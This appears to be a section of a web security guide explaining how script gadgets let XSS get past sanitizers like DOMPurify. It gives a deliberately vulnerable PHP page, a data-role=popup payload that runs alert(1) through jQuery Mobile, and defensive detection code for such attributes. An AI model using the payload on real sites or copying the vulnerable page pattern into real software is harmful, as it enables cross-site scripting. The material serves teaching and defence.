4.2.9.3. Bypass Via Script Gadgets

4.2.9.3.1. Introduction

Some websites use whitelisting or DOM-based defenses against XSS. A technique called Code Reuse (script gadgets) can bypass these. The idea is similar to gadgets in binary exploitation: legitimate code that is already present in the target page is reused to get around the defense. The method is described in detail in the paper "Code-Reuse Attacks for the Web: Breaking Cross-Site Scripting Mitigations via Script Gadgets".

A blog post by PortSwigger describes a similar idea: https://portswigger.net/blog/abusing-javascript-frameworks-to-bypass-xss-mitigations.

The following is a simple example. The page uses DOMPurify to sanitize the input, but it can still be attacked because it also loads jquery.mobile.js.

4.2.9.3.2. Examples

// index.php
<?php

$msg = $_GET['message'];
// newlines are removed so the value can be embedded in a JS string literal
$msg = str_replace("\n", "", $msg);
// base64 so the string survives the trip into atob() below
$msg = base64_encode($msg);

?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Preview</title>
    <script type="text/javascript" src="purify.js"></script>
    <script type="text/javascript" src="jquery.js"></script>
    <!-- jQuery Mobile is the gadget: it processes data-role elements after the page loads -->
    <script type="text/javascript" src="jquery.mobile.js"></script>
</head>
<body>

    <script type="text/javascript">
    var d= atob('<?php echo $msg; ?>');
    // DOMPurify keeps the div, its data-role attribute and its id value
    var cleanvar = DOMPurify.sanitize(d);
    document.write(cleanvar);
    </script>

</body>
</html>
// payload (data-role=popup is consumed by jquery.mobile.js; the id value is what it reuses)
<div data-role=popup id='-->
<script>alert(1)</script>'>
</div>
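As an added example (not code from the original page or from DOMPurify), the check below scans the markup a sanitizer lets through and flags the two things the payload above relies on: a framework-consumed data-* attribute and an id value containing the comment terminator "-->". DOMPurify keeps both by default because they are harmless without a framework on the page; in the setup above, the documented option DOMPurify.sanitize(d, { ALLOW_DATA_ATTR: false }) would drop the data-role attribute. The tokenizer and the function names are hypothetical helper code written for this example.

```javascript
// Minimal start-tag tokenizer. It honours quoted attribute values, so the ">"
// inside id='-->...' is not mistaken for the end of the tag (the detail that a
// naive split on ">" gets wrong and that lets the payload look harmless).
function parseTags(html) {
  const tags = [];
  let i = 0;
  while ((i = html.indexOf('<', i)) !== -1) {
    const m = /^<([a-zA-Z][\w-]*)/.exec(html.slice(i));
    if (!m) { i++; continue; }           // closing tag, comment or stray "<"
    const tag = { name: m[1].toLowerCase(), attrs: [] };
    i += m[0].length;
    for (;;) {
      i += /^\s*/.exec(html.slice(i))[0].length;
      if (html[i] === '>' || html[i] === undefined) { i++; break; }
      if (html.startsWith('/>', i)) { i += 2; break; }
      // name, then optionally = "value" | 'value' | unquoted
      const a = /^([^\s=\/>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]*)))?/.exec(html.slice(i));
      if (!a) { i++; break; }
      tag.attrs.push({ name: a[1].toLowerCase(), value: a[2] ?? a[3] ?? a[4] ?? '' });
      i += a[0].length;
    }
    tags.push(tag);
  }
  return tags;
}

// Attribute prefixes that a loaded framework, not the browser, acts on.
// jQuery Mobile reads data-*; extend this list for other frameworks in use.
const FRAMEWORK_ATTR_PREFIXES = ['data-'];

// Returns one hit per suspicious attribute so the caller can reject or log it.
function findGadgetAttributes(html) {
  const hits = [];
  for (const tag of parseTags(html)) {
    for (const { name, value } of tag.attrs) {
      if (FRAMEWORK_ATTR_PREFIXES.some((p) => name.startsWith(p))) {
        hits.push({ tag: tag.name, attr: name, value, reason: 'framework-consumed attribute' });
      } else if (name === 'id' && value.includes('-->')) {
        hits.push({ tag: tag.name, attr: name, value, reason: 'comment terminator in id' });
      }
    }
  }
  return hits;
}

// Constructed input: the page's payload as index.php sees it after the newline is stripped.
const SAMPLE = "<div data-role=popup id='--><script>alert(1)</script>'></div>";
console.log(findGadgetAttributes(SAMPLE)); // two hits: data-role=popup and the id value
```

This flags only the patterns the page's payload relies on; it is a screening step alongside a stricter sanitizer configuration, not a replacement for one.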